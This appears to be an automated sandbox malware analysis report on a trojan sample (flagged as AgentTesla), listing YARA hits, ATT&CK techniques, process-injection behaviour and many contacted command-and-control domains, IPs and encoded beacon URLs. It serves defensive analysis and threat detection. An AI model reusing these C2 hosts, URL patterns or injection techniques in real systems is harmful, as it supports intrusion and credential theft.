          Source: explorer.exe, 00000006.00000002.3825528277.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1356110369.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.3825528277.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1356110369.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000002.3820418043.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1355837876.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanq
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeQueries volume information: C:\Users\user\Desktop\hj3YCvtlg7.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00C726AE GetSystemTimeAsFileTime,7_2_00C726AE
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 5.2.hj3YCvtlg7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.hj3YCvtlg7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 5.2.hj3YCvtlg7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.hj3YCvtlg7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Shared Modules
          1
          DLL Side-Loading
          512
          Process Injection
          1
          Rootkit
          1
          Credential API Hooking
          1
          System Time Discovery
          Remote Services1
          Credential API Hooking
          1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading
          1
          Masquerading
          LSASS Memory131
          Security Software Discovery
          Remote Desktop Protocol1
          Archive Collected Data
          4
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
          Disable or Modify Tools
          Security Account Manager2
          Process Discovery
          SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook141
          Virtualization/Sandbox Evasion
          NTDS141
          Virtualization/Sandbox Evasion
          Distributed Component Object ModelInput Capture13
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script512
          Process Injection
          LSA Secrets1
          Application Window Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Deobfuscate/Decode Files or Information
          Cached Domain Credentials1
          System Network Configuration Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
          Obfuscated Files or Information
          DCSync1
          File and Directory Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
          Software Packing
          Proc Filesystem113
          System Information Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Timestomp
          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
          DLL Side-Loading
          Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1422327 Sample: hj3YCvtlg7.exe Startdate: 08/04/2024 Architecture: WINDOWS Score: 100 32 www.yoursweets.online 2->32 34 www.poseidoncrm.com 2->34 36 11 other IPs or domains 2->36 44 Snort IDS alert for network traffic 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 8 other signatures 2->50 11 hj3YCvtlg7.exe 3 2->11         started        signatures3 process4 signatures5 62 Tries to detect virtualization through RDTSC time measurements 11->62 64 Injects a PE file into a foreign processes 11->64 14 hj3YCvtlg7.exe 11->14         started        17 hj3YCvtlg7.exe 11->17         started        19 hj3YCvtlg7.exe 11->19         started        process6 signatures7 66 Modifies the context of a thread in another process (thread injection) 14->66 68 Maps a DLL or memory area into another process 14->68 70 Sample uses process hollowing technique 14->70 72 Queues an APC in another process (thread injection) 14->72 21 explorer.exe 104 1 14->21 injected process8 dnsIp9 38 www.mingshengglass.com 102.134.40.151, 49719, 80 sun-asnSC South Africa 21->38 40 oregonjobs.co 66.147.240.91, 49722, 80 UNIFIEDLAYER-AS-1US United States 21->40 42 4 other IPs or domains 21->42 52 Uses ipconfig to lookup or modify the Windows network settings 21->52 25 ipconfig.exe 21->25         started        signatures10 process11 signatures12 54 Modifies the context of a thread in another process (thread injection) 25->54 56 Reads the DNS cache 25->56 58 Maps a DLL or memory area into another process 25->58 60 Tries to detect virtualization through RDTSC time measurements 25->60 28 cmd.exe 1 25->28         started        process13 process14 30 conhost.exe 28->30         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          hj3YCvtlg7.exe68%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          hj3YCvtlg7.exe71%VirustotalBrowse
          hj3YCvtlg7.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          www.owletbaby.shop0%VirustotalBrowse
          www.helyibudapest.com0%VirustotalBrowse
          www.mingshengglass.com0%VirustotalBrowse
          oregonjobs.co1%VirustotalBrowse
          ethicai.pro1%VirustotalBrowse
          www.bombslot-42.co0%VirustotalBrowse
          www.kidscircle.shop0%VirustotalBrowse
          www.ethicai.pro0%VirustotalBrowse
          www.yoursweets.online0%VirustotalBrowse
          www.erabits.com0%VirustotalBrowse
          www.mayorii.com0%VirustotalBrowse
          www.oregonjobs.co0%VirustotalBrowse
          SourceDetectionScannerLabelLink
          https://www.stacker.com/arizona/phoenix0%URL Reputationsafe
          https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de0%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          http://www.yoursweets.online100%Avira URL Cloudmalware
          http://www.oregonjobs.co/vr01/0%Avira URL Cloudsafe
          http://www.poseidoncrm.comReferer:0%Avira URL Cloudsafe
          http://tempuri.org/DataSet1.xsd0%Avira URL Cloudsafe
          http://www.mayorii.com/vr01/www.oregonjobs.co0%Avira URL Cloudsafe
          http://www.helyibudapest.comReferer:0%Avira URL Cloudsafe
          http://www.owletbaby.shop/vr01/0%Avira URL Cloudsafe
          http://www.helyibudapest.com/vr01/www.poseidoncrm.com0%Avira URL Cloudsafe
          http://tempuri.org/DataSet1.xsd0%VirustotalBrowse
          http://www.elcaporalburley.com/vr01/www.molobeverello.com0%Avira URL Cloudsafe
          http://www.elcaporalburley.comReferer:0%Avira URL Cloudsafe
          http://www.oregonjobs.coReferer:0%Avira URL Cloudsafe
          http://www.mingshengglass.com/vr01/?uTm4=p/xcNqzHhW+jsc+DeauMV/rjlfuack/vmC9Eop/11cDYDFLPNTQG2lepFRzL3IBjum3b&R2M=NjOhAHzH5LxTCNrP0%Avira URL Cloudsafe
          http://www.oregonjobs.co/vr01/0%VirustotalBrowse
          http://www.erabits.com/vr01/0%Avira URL Cloudsafe
          http://www.yoursweets.online0%VirustotalBrowse
          http://www.bombslot-42.co/vr01/?uTm4=CRIcXgDta+9JTffevem10+yBm+uKfejT3UejFVr1Q2sKU73ve+2FIZL4fAb3NdJYnMZe&R2M=NjOhAHzH5LxTCNrP0%Avira URL Cloudsafe
          http://www.erabits.com/vr01/www.mingshengglass.com0%Avira URL Cloudsafe
          http://www.owletbaby.shop/vr01/0%VirustotalBrowse
          http://www.kidscircle.shopReferer:0%Avira URL Cloudsafe
          www.yoursweets.online/vr01/100%Avira URL Cloudmalware
          http://www.yesxoit.xyz/vr01/www.elcaporalburley.com0%Avira URL Cloudsafe
          http://www.ethicai.pro/vr01/0%Avira URL Cloudsafe
          http://www.erabits.com/vr01/0%VirustotalBrowse
          http://www.bombslot-42.co0%Avira URL Cloudsafe
          http://www.yesxoit.xyzReferer:0%Avira URL Cloudsafe
          http://www.oregonjobs.co0%Avira URL Cloudsafe
          http://www.owletbaby.shop0%Avira URL Cloudsafe
          http://www.jupitr-claim.top/vr01/www.nicolbauer.com100%Avira URL Cloudmalware
          http://www.bombslot-42.co0%VirustotalBrowse
          http://www.ethicai.pro/vr01/0%VirustotalBrowse
          http://www.jupitr-claim.top100%Avira URL Cloudmalware
          http://www.nicolbauer.comReferer:0%Avira URL Cloudsafe
          http://www.mayorii.comReferer:0%Avira URL Cloudsafe
          http://www.owletbaby.shop0%VirustotalBrowse
          http://www.ethicai.pro/vr01/www.owletbaby.shop0%Avira URL Cloudsafe
          www.yoursweets.online/vr01/2%VirustotalBrowse
          http://www.bombslot-42.co/vr01/www.erabits.com0%Avira URL Cloudsafe
          http://www.jupitr-claim.top1%VirustotalBrowse
          http://www.molobeverello.com0%Avira URL Cloudsafe
          http://www.mingshengglass.comReferer:0%Avira URL Cloudsafe
          http://www.owletbaby.shopReferer:0%Avira URL Cloudsafe
          http://www.jupitr-claim.topReferer:0%Avira URL Cloudsafe
          http://www.oregonjobs.co0%VirustotalBrowse
          http://www.kidscircle.shop/vr01/0%Avira URL Cloudsafe
          http://www.ethicai.pro0%Avira URL Cloudsafe
          http://www.mingshengglass.com/vr01/www.yoursweets.online0%Avira URL Cloudsafe
          http://www.nicolbauer.com/vr01/0%Avira URL Cloudsafe
          http://www.yesxoit.xyz0%Avira URL Cloudsafe
          http://www.jupitr-claim.top/vr01/100%Avira URL Cloudmalware
          http://www.mingshengglass.com/vr01/0%Avira URL Cloudsafe
          http://www.yoursweets.online/vr01/www.ethicai.pro100%Avira URL Cloudmalware
          http://www.erabits.com0%Avira URL Cloudsafe
          http://www.owletbaby.shop/vr01/?R2M=NjOhAHzH5LxTCNrP&uTm4=om+RAj8+1U0Z4Q5rkk8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuS9IxznZs+QL0%Avira URL Cloudsafe
          http://www.oregonjobs.co/vr01/www.helyibudapest.com0%Avira URL Cloudsafe
          http://www.poseidoncrm.com0%Avira URL Cloudsafe
          http://www.nicolbauer.com0%Avira URL Cloudsafe
          http://www.poseidoncrm.com/vr01/www.yesxoit.xyz0%Avira URL Cloudsafe
          http://www.yoursweets.online/vr01/100%Avira URL Cloudmalware
          http://www.mayorii.com0%Avira URL Cloudsafe
          http://www.erabits.comReferer:0%Avira URL Cloudsafe
          http://www.molobeverello.comReferer:0%Avira URL Cloudsafe
          http://www.molobeverello.com/vr01/0%Avira URL Cloudsafe
          http://www.elcaporalburley.com0%Avira URL Cloudsafe
          http://www.bombslot-42.co/vr01/0%Avira URL Cloudsafe
          http://www.kidscircle.shop0%Avira URL Cloudsafe
          http://www.helyibudapest.com0%Avira URL Cloudsafe
          http://www.bombslot-42.coReferer:0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          www.owletbaby.shop
          13.248.169.48
          truetrueunknown
          www.helyibudapest.com
          172.67.154.171
          truetrueunknown
          www.mingshengglass.com
          102.134.40.151
          truetrueunknown
          oregonjobs.co
          66.147.240.91
          truetrueunknown
          ethicai.pro
          3.33.130.190
          truetrueunknown
          www.bombslot-42.co
          104.21.56.10
          truetrueunknown
          www.kidscircle.shop
          13.248.169.48
          truetrueunknown
          www.erabits.com
          unknown
          unknowntrueunknown
          www.ethicai.pro
          unknown
          unknowntrueunknown
          www.poseidoncrm.com
          unknown
          unknowntrue
            unknown
            www.oregonjobs.co
            unknown
            unknowntrueunknown
            www.yoursweets.online
            unknown
            unknowntrueunknown
            www.mayorii.com
            unknown
            unknowntrueunknown
            NameMaliciousAntivirus DetectionReputation
            http://www.mingshengglass.com/vr01/?uTm4=p/xcNqzHhW+jsc+DeauMV/rjlfuack/vmC9Eop/11cDYDFLPNTQG2lepFRzL3IBjum3b&R2M=NjOhAHzH5LxTCNrPtrue
            • Avira URL Cloud: safe
            unknown
            http://www.bombslot-42.co/vr01/?uTm4=CRIcXgDta+9JTffevem10+yBm+uKfejT3UejFVr1Q2sKU73ve+2FIZL4fAb3NdJYnMZe&R2M=NjOhAHzH5LxTCNrPtrue
            • Avira URL Cloud: safe
            unknown
            www.yoursweets.online/vr01/true
            • 2%, Virustotal, Browse
            • Avira URL Cloud: malware
            low
            http://www.owletbaby.shop/vr01/?R2M=NjOhAHzH5LxTCNrP&uTm4=om+RAj8+1U0Z4Q5rkk8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuS9IxznZs+QLtrue
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://www.oregonjobs.co/vr01/explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
              high
              https://wns.windows.com/batexplorer.exe, 00000006.00000003.2299319275.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1359952336.000000000899E000.00000004.00000001.00020000.00000000.sdmpfalse
                high
                http://www.mayorii.com/vr01/www.oregonjobs.coexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.yoursweets.onlineexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: malware
                unknown
                https://www.stacker.com/arizona/phoenixexplorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://tempuri.org/DataSet1.xsdhj3YCvtlg7.exefalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1356648660.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3083184749.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                  high
                  https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_deexplorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://excel.office.comexplorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3842240210.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082075115.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmpfalse
                    high
                    https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                      high
                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(explorer.exe, 00000006.00000002.3842240210.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2299846067.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1362710142.000000000BD22000.00000004.00000001.00020000.00000000.sdmpfalse
                        high
                        https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameriexplorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                          high
                          http://www.poseidoncrm.comReferer:explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.owletbaby.shop/vr01/explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.helyibudapest.comReferer:explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.helyibudapest.com/vr01/www.poseidoncrm.comexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://android.notify.windows.com/iOSpexplorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2300169134.000000000BE2F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmpfalse
                            high
                            https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                              high
                              https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&ocexplorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                high
                                https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-oexplorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                  high
                                  https://api.msn.com/rTexplorer.exe, 00000006.00000002.3838977700.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1359952336.0000000008796000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    http://www.elcaporalburley.com/vr01/www.molobeverello.comexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.elcaporalburley.comReferer:explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.oregonjobs.coReferer:explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.erabits.com/vr01/explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      http://www.erabits.com/vr01/www.mingshengglass.comexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.kidscircle.shopReferer:explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://word.office.comexplorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3842240210.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082075115.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        high
                                        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          high
                                          http://www.yesxoit.xyz/vr01/www.elcaporalburley.comexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
